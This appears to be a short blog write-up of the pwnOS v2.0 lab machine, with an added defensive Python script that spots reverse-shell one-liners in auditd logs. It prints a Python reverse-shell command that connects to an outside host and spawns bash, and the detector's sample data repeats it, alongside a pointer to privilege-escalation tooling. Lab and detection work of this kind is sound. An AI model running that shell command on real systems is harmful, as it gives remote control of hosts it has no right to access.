So I have been playing around with pwnOS v2.0. For spoilers, you can refer to this link. Due to my lack of attention, I did not spot the duplicate file and hence, did not get any valid root passwords, but knowing the solution, it does seem like quite a bit of a letdown.
One thing I did slightly differently was to use a Python reverse shell documented by pentestmonkey in the sqlmap --os-shell context. This worked sufficiently to give me an OOB shell.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
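From the defender's side, a one-liner like this leaves a recognisable trace wherever process arguments are logged. The following is an added example, not part of the original post: it assumes auditd EXECVE logging is enabled, the function names and trait labels are hypothetical, and the log records are constructed, using the documentation address 192.0.2.10.

```python
import re

ARG = re.compile(r'\ba(\d+)=("[^"]*"|[0-9A-Fa-f]+)')
DUP2 = re.compile(r'os\.dup2\s*\([^,]+,\s*([012])\s*\)')
SHELL = re.compile(r'(?:subprocess\.(?:call|Popen|run)|os\.system|pty\.spawn)\s*\(.*?/bin/(?:ba)?sh')

def decode_execve(record):
    """Return argv from one auditd EXECVE record (quoted or hex-encoded args)."""
    args = {}
    for idx, val in ARG.findall(record):
        # auditd hex-encodes arguments that contain spaces or quotes
        args[int(idx)] = val[1:-1] if val[0] == '"' else bytes.fromhex(val).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]

def indicators(argv):
    """Name the reverse-shell traits found in a `python -c <code>` invocation."""
    if not re.fullmatch(r"(?:.*/)?python[\d.]*", argv[0] if argv else "") or "-c" not in argv[1:-1]:
        return []
    code = argv[argv.index("-c", 1) + 1]
    checks = {
        "outbound-socket": "socket.socket(" in code and ".connect(" in code,
        "stdio-redirected-to-socket": set(DUP2.findall(code)) == {"0", "1", "2"},
        "shell-spawn": bool(SHELL.search(code)),
    }
    return [name for name, hit in checks.items() if hit]

def scan(log):
    """Return (audit event serial, traits) for EXECVE records showing all three traits."""
    hits = []
    for line in log.splitlines():
        found = indicators(decode_execve(line)) if "type=EXECVE" in line else []
        if len(found) == 3:
            hits.append((int(re.search(r"audit\([\d.]+:(\d+)\)", line).group(1)), found))
    return hits

# --- constructed sample data; 192.0.2.10 is a documentation address ---
def record(serial, argv):  # simplified stand-in for auditd's argument encoding
    enc = lambda a: a.encode().hex().upper() if re.search(r'[\s"]', a) else f'"{a}"'
    args = " ".join(f"a{i}={enc(a)}" for i, a in enumerate(argv))
    return f"type=EXECVE msg=audit(1700000000.000:{serial}): argc={len(argv)} {args}"
SHELL_CMD = ('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
             's.connect(("192.0.2.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); '
             'os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);')
FETCH_CMD = 'import socket;s=socket.socket();s.connect(("192.0.2.10",80));s.close()'
SAMPLE_LOG = "\n".join(record(400 + n, ["python", "-c", cmd])
                       for n, cmd in enumerate([SHELL_CMD, FETCH_CMD, "print(1)"]))

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Requiring all three traits together keeps ordinary `python -c` socket scripts, such as the second sample record, from raising an alert.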
One tool which I had also encountered was Linux Exploit Suggester, although it seemed to have been updated about 5 months ago. Still, I’m sure it could be very useful if you have non-privileged shell access to an older, not-as-frequently-updated Linux box, and are searching for local privesc root exploits. I would also recommend this site for a list of commands you should run in order to enumerate the system after getting said shell access.